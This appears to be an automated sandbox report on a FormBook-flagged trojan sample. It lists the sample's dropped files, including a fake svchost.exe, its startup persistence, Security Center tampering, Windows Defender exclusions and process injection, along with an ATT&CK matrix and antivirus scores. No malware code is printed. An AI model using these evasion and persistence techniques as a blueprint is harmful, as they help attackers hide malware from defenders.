                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Queries volume information: C:\Users\Public\Documents\2FDD6624\svchost.exe VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Queries volume information: C:\Users\Public\Documents\2FDD6624\svchost.exe VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe | Code function: 5_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,

                Lowering of HIPS / PFW / Operating System Security Settings:

                Changes security center settings (notifications, updates, antivirus, firewall)
                Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                Source: svchost.exe, 0000001A.00000002.590444499.0000021F5D629000.00000004.00000001.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                Stealing of Sensitive Information:

                Yara detected FormBook
                Source: Yara match | File source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, type: MEMORY

                Remote Access Functionality:

                Yara detected FormBook
                Source: Yara match | File source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                (Digits following a technique name are the superscript counters from the original matrix; "-" marks an empty cell.)

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | Windows Management Instrumentation 12 | Startup Items 1 | Startup Items 1 | Disable or Modify Tools 211 | OS Credential Dumping | File and Directory Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                Default Accounts | Native API 11 | DLL Side-Loading 1 | Exploitation for Privilege Escalation 1 | Deobfuscate/Decode Files or Information 11 | LSASS Memory | System Information Discovery 133 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | Command and Scripting Interpreter 1 | Application Shimming 1 | DLL Side-Loading 1 | Obfuscated Files or Information 2 | Security Account Manager | Query Registry 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | Service Execution 2 | Windows Service 1 | Application Shimming 1 | DLL Side-Loading 1 | NTDS | Security Software Discovery 461 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | - | Carrier Billing Fraud
                Cloud Accounts | Cron | Registry Run Keys / Startup Folder 221 | Access Token Manipulation 1 | Masquerading 111 | LSA Secrets | Virtualization/Sandbox Evasion 161 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
                Replication Through Removable Media | Launchd | Rc.common | Windows Service 1 | Virtualization/Sandbox Evasion 161 | Cached Domain Credentials | Process Discovery 3 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
                External Remote Services | Scheduled Task | Startup Items | Process Injection 412 | Access Token Manipulation 1 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Registry Run Keys / Startup Folder 221 | Process Injection 412 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue

                Behavior Graph

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                [Behavior graph, rendered here as a process tree. Behavior Graph ID: 483549, Sample: RYhdmjjr94, Startdate: 15/09/2021, Architecture: WINDOWS, Score: 100]

                Signatures attached to the start node: Malicious sample detected (through community Yara rule); Sigma detected: Powershell adding suspicious path to exclusion list; Multi AV Scanner detection for submitted file; 12 other signatures

                RYhdmjjr94.exe (started; graph counters 9, 11)
                    dropped: C:\Users\user\AppData\...\36C95A71.exe (PE32); C:\Users\Public\Documents\...\svchost.exe (PE32); C:\Users\...\36C95A71.exe:Zone.Identifier (ASCII); 2 other files (1 malicious)
                    signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Creates autostart registry keys with suspicious names; Drops PE files to the startup folder; 4 other signatures
                    aspnet_compiler.exe (started)
                        signatures: Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                        explorer.exe (injected)
                            svchost.exe (started)
                                dropped: C:\Users\user\AppData\...\AdvancedRun.exe (PE32)
                                signatures: Adds a directory exclusion to Windows Defender
                                AdvancedRun.exe (started)
                    36C95A71.exe (started)
                        dropped: C:\Users\user\AppData\...\AdvancedRun.exe (PE32)
                        signatures: Adds a directory exclusion to Windows Defender
                        AdvancedRun.exe (started)
                            AdvancedRun.exe (started)
                        powershell.exe (started)
                            conhost.exe (started)
                        powershell.exe (started)
                            conhost.exe (started)
                    WerFault.exe (started)
                        dropped: C:\ProgramData\Microsoft\...\Report.wer (Little-endian)
                    9 other processes (started)
                        DNS/IP: 192.168.2.1 unknown unknown
                        AdvancedRun.exe (started)
                        conhost.exe (started)
                        7 other processes (started)
                svchost.exe (started)
                    dropped: C:\Users\user\AppData\...\AdvancedRun.exe (PE32)
                    signatures: Multi AV Scanner detection for dropped file; Adds a directory exclusion to Windows Defender
                    AdvancedRun.exe (started)
                        AdvancedRun.exe (started)
                36C95A71.exe (started)
                    dropped: C:\Users\user\AppData\...\AdvancedRun.exe (PE32)
                    AdvancedRun.exe (started)
                        AdvancedRun.exe (started)
                9 other processes (started)
                    DNS/IP: 127.0.0.1 unknown unknown
                    signatures: Changes security center settings (notifications, updates, antivirus, firewall)
                    WerFault.exe (started)


                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

Source | Detection | Scanner | Label
RYhdmjjr94.exe | 46% | Virustotal |
RYhdmjjr94.exe | 23% | Metadefender |
RYhdmjjr94.exe | 51% | ReversingLabs | Win32.Trojan.Sabsik

                Dropped Files

Source | Detection | Scanner | Label
C:\Users\Public\Documents\2FDD6624\svchost.exe | 46% | Virustotal |
C:\Users\Public\Documents\2FDD6624\svchost.exe | 23% | Metadefender |
C:\Users\Public\Documents\2FDD6624\svchost.exe | 51% | ReversingLabs | Win32.Trojan.Sabsik
C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe | 0% | Virustotal |
C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe | 0% | Virustotal |
C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe | 0% | ReversingLabs |

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

Source | Detection | Scanner | Label
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe
https://sectigo.com/CPS0C | 0% | URL Reputation | safe
https://sectigo.com/CPS0D | 0% | URL Reputation | safe
http://www.bingmapsportal.comsv | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
https://%s.xboxlive.com | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | 0% | URL Reputation | safe
https://dynamic.t | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPub | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ocsp.sectigo.com0 | RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp, RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/ | svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmp | false | | high
https://t0.tiles.ditu.live.com/tiles/gen | svchost.exe, 00000010.00000002.331248792.00000188CA213000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp | false | | high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n= | svchost.exe, 00000010.00000002.331459917.00000188CA242000.00000004.00000001.sdmp | false | | high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 00000010.00000003.328215736.00000188CA249000.00000004.00000001.sdmp | false | | high
